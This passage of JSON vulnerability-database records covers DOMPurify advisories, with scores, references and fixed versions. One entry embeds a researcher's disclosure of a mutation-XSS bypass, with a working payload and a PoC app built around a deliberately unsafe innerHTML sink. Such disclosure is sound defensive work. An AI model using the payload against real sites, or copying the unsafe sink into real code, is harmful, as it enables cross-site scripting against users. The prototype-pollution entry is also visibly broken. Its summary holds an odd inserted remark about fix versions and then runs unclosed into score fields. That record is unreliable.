"value": "0.00962", "scoring_system": "epss", "scoring_elements": "0.7693", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00962", "scoring_system": "epss", "scoring_elements": "0.7701", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00962", "scoring_system": "epss", "scoring_elements": "0.77017", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16728" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html" }, { "reference_url": "https://research.securitum.com/dompurify-bypass-using-mxss", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://research.securitum.com/dompurify-bypass-using-mxss" }, { "reference_url": "https://research.securitum.com/dompurify-bypass-using-mxss/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://research.securitum.com/dompurify-bypass-using-mxss/" }, { "reference_url": "https://www.npmjs.com/advisories/1205", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/1205" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16728", "reference_id": "CVE-2019-16728", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16728" }, { "reference_url": "https://github.com/advisories/GHSA-chqj-j4fh-rw7m", "reference_id": "GHSA-chqj-j4fh-rw7m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-chqj-j4fh-rw7m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/447288?format=api", "purl": "pkg:npm/dompurify@2.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": 
"VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-nz3k-udjb-3fhz" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/16899?format=api", "purl": "pkg:npm/dompurify@2.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-nz3k-udjb-3fhz" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.3" } ], "aliases": [ "CVE-2019-16728", "GHSA-chqj-j4fh-rw7m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gbb5-2vbk-suh8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/326566?format=api", "vulnerability_id": "VCID-gzpp-fw72-57hu", "summary": "", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26870", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00417", "scoring_system": "epss", "scoring_elements": "0.62284", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00417", "scoring_system": "epss", "scoring_elements": "0.62176", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00417", "scoring_system": "epss", "scoring_elements": "0.62289", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00417", "scoring_system": "epss", 
"scoring_elements": "0.62278", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26870" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d" }, { "reference_url": "https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26870", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26870" }, { "reference_url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870", "reference_id": "", "reference_type": "", "scores": [ { 
"value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870" }, { "reference_url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass" }, { "reference_url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/" }, { "reference_url": "https://snyk.io/vuln/SNYK-JS-DOMPURIFY-1016634", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://snyk.io/vuln/SNYK-JS-DOMPURIFY-1016634" }, { "reference_url": "https://github.com/advisories/GHSA-63q7-h895-m982", "reference_id": "GHSA-63q7-h895-m982", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-63q7-h895-m982" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/382121?format=api", "purl": "pkg:npm/dompurify@2.0.17", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { 
"vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.17" } ], "aliases": [ "CVE-2020-26870", "GHSA-63q7-h895-m982" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gzpp-fw72-57hu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360058?format=api", "vulnerability_id": "VCID-jnpe-6ax6-zubr", "summary": "DOMPurify is vulnerable to mutation-XSS via Re-Contextualization\n## Description\n\nA mutation-XSS (mXSS) condition was confirmed when sanitized HTML is reinserted into a new parsing context using `innerHTML` and special wrappers. The vulnerable wrappers confirmed in browser behavior are `script`, `xmp`, `iframe`, `noembed`, `noframes`, and `noscript`. The payload remains seemingly benign after `DOMPurify.sanitize()`, but mutates during the second parse into executable markup with an event handler, enabling JavaScript execution in the client (`alert(1)` in the PoC).\n\n\n## Vulnerability\n\nThe root cause is context switching after sanitization: sanitized output is treated as trusted and concatenated into a wrapper string (for example, `<xmp> ... </xmp>` or other special wrappers) before being reparsed by the browser. In this flow, attacker-controlled text inside an attribute (for example `</xmp>` or equivalent closing sequences for each wrapper) closes the special parsing context early and reintroduces attacker markup (`<img ... onerror=...>`) outside the original attribute context. 
DOMPurify sanitizes the original parse tree, but the application performs a second parse in a different context, reactivating dangerous tokens (classic mXSS pattern).\n\n## PoC\n\n1. Start the PoC app:\n```bash\nnpm install\nnpm start\n```\n\n2. Open `http://localhost:3001`.\n3. Set `Wrapper en sink` to `xmp`.\n4. Use payload:\n```html\n <img src=x alt=\"</xmp><img src=x onerror=alert('expoc')>\">\n```\n\n5. Click `Sanitize + Render`.\n6. Observe:\n- `Sanitized response` still contains the `</xmp>` sequence inside `alt`.\n- The sink reparses to include `<img src=\"x\" onerror=\"alert('expoc')\">`.\n- `alert('expoc')` is triggered.\n7. Files:\n- index.html\n\n```html\n<!doctype html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <title>expoc - DOMPurify SSR PoC</title>\n <style>\n :root {\n --bg: #f7f8fb;\n --panel: #ffffff;\n --line: #d8dce6;\n --text: #0f172a;\n --muted: #475569;\n --accent: #0ea5e9;\n }\n\n * {\n box-sizing: border-box;\n }\n\n body {\n margin: 0;\n font-family: \"SF Mono\", Menlo, Consolas, monospace;\n color: var(--text);\n background: radial-gradient(circle at 10% 0%, #e0f2fe 0%, var(--bg) 60%);\n }\n\n main {\n max-width: 980px;\n margin: 28px auto;\n padding: 0 16px 20px;\n }\n\n h1 {\n margin: 0 0 10px;\n font-size: 1.45rem;\n }\n\n p {\n margin: 0;\n color: var(--muted);\n }\n\n .grid {\n display: grid;\n gap: 14px;\n margin-top: 16px;\n }\n\n .card {\n background: var(--panel);\n border: 1px solid var(--line);\n border-radius: 12px;\n padding: 14px;\n }\n\n label {\n display: block;\n margin-bottom: 7px;\n font-size: 0.85rem;\n color: var(--muted);\n }\n\n textarea,\n input,\n select,\n button {\n width: 100%;\n border: 1px solid var(--line);\n border-radius: 8px;\n padding: 9px 10px;\n font: inherit;\n background: #fff;\n }\n\n textarea {\n min-height: 110px;\n resize: vertical;\n }\n\n .row {\n display: grid;\n grid-template-columns: 1fr 230px;\n gap: 
12px;\n }\n\n button {\n cursor: pointer;\n background: var(--accent);\n color: #fff;\n border-color: #0284c7;\n }\n\n #sink {\n min-height: 90px;\n border: 1px dashed #94a3b8;\n border-radius: 8px;\n padding: 10px;\n background: #f8fafc;\n }\n\n pre {\n margin: 0;\n white-space: pre-wrap;\n word-break: break-word;\n }\n\n .note {\n margin-top: 8px;\n font-size: 0.85rem;\n }\n\n .status-grid {\n display: grid;\n grid-template-columns: repeat(auto-fit, minmax(180px, 1fr));\n gap: 8px;\n margin-top: 10px;\n }\n\n .status-item {\n border: 1px solid var(--line);\n border-radius: 8px;\n padding: 8px 10px;\n font-size: 0.85rem;\n background: #fff;\n }\n\n .status-item.vuln {\n border-color: #ef4444;\n background: #fef2f2;\n }\n\n .status-item.safe {\n border-color: #22c55e;\n background: #f0fdf4;\n }\n\n @media (max-width: 760px) {\n .row {\n grid-template-columns: 1fr;\n }\n }\n </style>\n </head>\n <body>\n <main>\n <h1>expoc - DOMPurify Server-Side PoC</h1>\n <p>\n Flujo: input -> POST /sanitize (Node + jsdom + DOMPurify) -> render vulnerable con innerHTML.\n </p>\n\n <div class=\"grid\">\n <section class=\"card\">\n <label for=\"payload\">Payload</label>\n <textarea id=\"payload\"><img src=x alt=\"</script><img src=x onerror=alert('expoc')>\"></textarea>\n <div class=\"row\" style=\"margin-top: 10px;\">\n <div>\n <label for=\"wrapper\">Wrapper en sink</label>\n <select id=\"wrapper\">\n <option value=\"div\">div</option>\n <option value=\"textarea\">textarea</option>\n <option value=\"title\">title</option>\n <option value=\"style\">style</option>\n <option value=\"script\" selected>script</option>\n <option value=\"xmp\">xmp</option>\n <option value=\"iframe\">iframe</option>\n <option value=\"noembed\">noembed</option>\n <option value=\"noframes\">noframes</option>\n <option value=\"noscript\">noscript</option>\n </select>\n </div>\n <div style=\"display:flex;align-items:end;\">\n <button id=\"run\" type=\"button\">Sanitize + Render</button>\n </div>\n </div>\n <p 
class=\"note\">Se usa render vulnerable: <code>sink.innerHTML = '<wrapper>' + sanitized + '</wrapper>'</code>.</p>\n <div class=\"status-grid\">\n <div class=\"status-item vuln\">script (vulnerable)</div>\n <div class=\"status-item vuln\">xmp (vulnerable)</div>\n <div class=\"status-item vuln\">iframe (vulnerable)</div>\n <div class=\"status-item vuln\">noembed (vulnerable)</div>\n <div class=\"status-item vuln\">noframes (vulnerable)</div>\n <div class=\"status-item vuln\">noscript (vulnerable)</div>\n <div class=\"status-item safe\">div (no vulnerable)</div>\n <div class=\"status-item safe\">textarea (no vulnerable)</div>\n <div class=\"status-item safe\">title (no vulnerable)</div>\n <div class=\"status-item safe\">style (no vulnerable)</div>\n </div>\n </section>\n\n <section class=\"card\">\n <label>Sanitized response</label>\n <pre id=\"sanitized\">(empty)</pre>\n </section>\n\n <section class=\"card\">\n <label>Sink</label>\n <div id=\"sink\"></div>\n </section>\n </div>\n </main>\n\n <script>\n const payload = document.getElementById('payload');\n const wrapper = document.getElementById('wrapper');\n const run = document.getElementById('run');\n const sanitizedNode = document.getElementById('sanitized');\n const sink = document.getElementById('sink');\n\n run.addEventListener('click', async () => {\n const response = await fetch('/sanitize', {\n method: 'POST',\n headers: { 'Content-Type': 'application/json' },\n body: JSON.stringify({ input: payload.value })\n });\n\n const data = await response.json();\n const sanitized = data.sanitized || '';\n const w = wrapper.value;\n\n sanitizedNode.textContent = sanitized;\n sink.innerHTML = '<' + w + '>' + sanitized + '</' + w + '>';\n });\n </script>\n </body>\n</html>\n```\n\n- server.js\n\n```js\nconst express = require('express');\nconst path = require('path');\nconst { JSDOM } = require('jsdom');\nconst createDOMPurify = require('dompurify');\n\nconst app = express();\nconst port = process.env.PORT || 
3001;\n\nconst window = new JSDOM('').window;\nconst DOMPurify = createDOMPurify(window);\n\napp.use(express.json());\napp.use(express.static(path.join(__dirname, 'public')));\n\napp.get('/health', (_req, res) => {\n res.json({ ok: true, service: 'expoc' });\n});\n\napp.post('/sanitize', (req, res) => {\n const input = typeof req.body?.input === 'string' ? req.body.input : '';\n const sanitized = DOMPurify.sanitize(input);\n res.json({ sanitized });\n});\n\napp.listen(port, () => {\n console.log(`expoc running at http://localhost:${port}`);\n});\n```\n\n- package.json\n\n```json\n{\n \"name\": \"expoc\",\n \"version\": \"1.0.0\",\n \"main\": \"server.js\",\n \"scripts\": {\n \"test\": \"echo \\\"Error: no test specified\\\" && exit 1\",\n \"start\": \"node server.js\",\n \"dev\": \"node server.js\"\n },\n \"keywords\": [],\n \"author\": \"\",\n \"license\": \"ISC\",\n \"description\": \"\",\n \"dependencies\": {\n \"dompurify\": \"^3.3.1\",\n \"express\": \"^5.2.1\",\n \"jsdom\": \"^28.1.0\"\n }\n}\n```\n\n## Evidence\n\n- PoC\n\n[daft-video.webm](https://github.com/user-attachments/assets/499a593d-0241-4ab8-95a9-cf49a00bda90)\n\n- XSS triggered\n<img width=\"2746\" height=\"1588\" alt=\"daft-img\" src=\"https://github.com/user-attachments/assets/1f463c14-d5a3-4c93-94e4-12d2d02c7d15\" />\n\n## Why This Happens\nThis is a mutation-XSS pattern caused by a parse-context mismatch:\n\n- Parse 1 (sanitization phase): input is interpreted under normal HTML parsing rules.\n- Parse 2 (sink phase): sanitized output is embedded into a wrapper that changes parser state (`xmp` raw-text behavior).\n- Attacker-controlled sequence (`</xmp>`) gains structural meaning in parse 2 and alters DOM structure.\n\nSanitization is not a universal guarantee across all future parsing contexts. The sink design reintroduces risk.\n\n## Remediation Guidance\n1. Do not concatenate sanitized strings into new HTML wrappers followed by `innerHTML`.\n2. 
Keep the rendering context stable from sanitize to sink.\n3. Prefer DOM-safe APIs (`textContent`, `createElement`, `setAttribute`) over string-based HTML composition.\n4. If HTML insertion is required, sanitize as close as possible to final insertion context and avoid wrapper constructs with raw-text semantics (`xmp`, `script`, etc.).\n5. Add regression tests for context-switch/mXSS payloads (including `</xmp>`, `</noscript>`, similar parser-breakout markers).\n\nReported by Oscar Uribe, Security Researcher at Fluid Attacks. Camilo Vera and Cristian Vargas from the Fluid Attacks Research Team have identified a mXSS via Re-Contextualization in DomPurify 3.3.1.\n\nFollowing Fluid Attacks [Disclosure Policy](https://fluidattacks.com/advisories/policy), if this report corresponds to a vulnerability and the conditions outlined in the policy are met, this advisory will be published on the website over the next few days (the timeline may vary depending on maintainers' willingness to attend to and respond to this report) at the following URL: https://fluidattacks.com/advisories/daft\n\nAcknowledgements: [Camilo Vera](https://github.com/caverav/) and [Cristian Vargas](https://github.com/tachote).", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h8r8-wccr-v5f2" }, { "reference_url": "https://github.com/advisories/GHSA-h8r8-wccr-v5f2", "reference_id": "GHSA-h8r8-wccr-v5f2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], 
"url": "https://github.com/advisories/GHSA-h8r8-wccr-v5f2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40110?format=api", "purl": "pkg:npm/dompurify@3.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2" } ], "aliases": [ "GHSA-h8r8-wccr-v5f2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jnpe-6ax6-zubr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205923?format=api", "vulnerability_id": "VCID-nz3k-udjb-3fhz", "summary": "Cross-Site Scripting in dompurify", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/2.0.7", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/2.0.7" }, { "reference_url": "https://www.npmjs.com/advisories/1223", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/1223" }, { "reference_url": "https://github.com/advisories/GHSA-mjjq-c88q-qhr6", "reference_id": "GHSA-mjjq-c88q-qhr6", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mjjq-c88q-qhr6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/17520?format=api", "purl": "pkg:npm/dompurify@2.0.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": 
"VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.0.7" } ], "aliases": [ "GHSA-mjjq-c88q-qhr6", "GMS-2020-711" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nz3k-udjb-3fhz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56525?format=api", "vulnerability_id": "VCID-wmjr-1h3n-hbhb", "summary": "DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify was vulnerable to prototype pollution. 
This vulnerability is fixed in 2.4.2 (note that the 2.4.2 package listed below as the fix is itself still marked as affected by other advisories in this record, so the fix version for this single issue is not a safe upgrade target on its own).
"value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48910" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2322949", "reference_id": "2322949", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2322949" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc", "reference_id": "d1dd0374caef2b4c56c3bd09fe1988c3479166dc", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc" }, { "reference_url": "https://github.com/advisories/GHSA-p3vf-v8qc-cwcr", "reference_id": "GHSA-p3vf-v8qc-cwcr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p3vf-v8qc-cwcr" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr", "reference_id": "GHSA-p3vf-v8qc-cwcr", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": 
"cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-31T15:52:58Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-p3vf-v8qc-cwcr" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10186", "reference_id": "RHSA-2024:10186", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10186" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9583", "reference_id": "RHSA-2024:9583", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9583" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:9620", "reference_id": "RHSA-2024:9620", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:9620" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0079", "reference_id": "RHSA-2025:0079", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0079" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0082", "reference_id": "RHSA-2025:0082", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0082" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0654", "reference_id": "RHSA-2025:0654", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0654" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0875", "reference_id": "RHSA-2025:0875", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0875" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:18233", "reference_id": "RHSA-2025:18233", 
"reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:18233" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19003", "reference_id": "RHSA-2025:19003", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19003" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19017", "reference_id": "RHSA-2025:19017", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19017" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19047", "reference_id": "RHSA-2025:19047", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19047" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19058", "reference_id": "RHSA-2025:19058", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19058" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19306", "reference_id": "RHSA-2025:19306", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19306" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19314", "reference_id": "RHSA-2025:19314", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19314" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:19895", "reference_id": "RHSA-2025:19895", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:19895" }, { "reference_url": 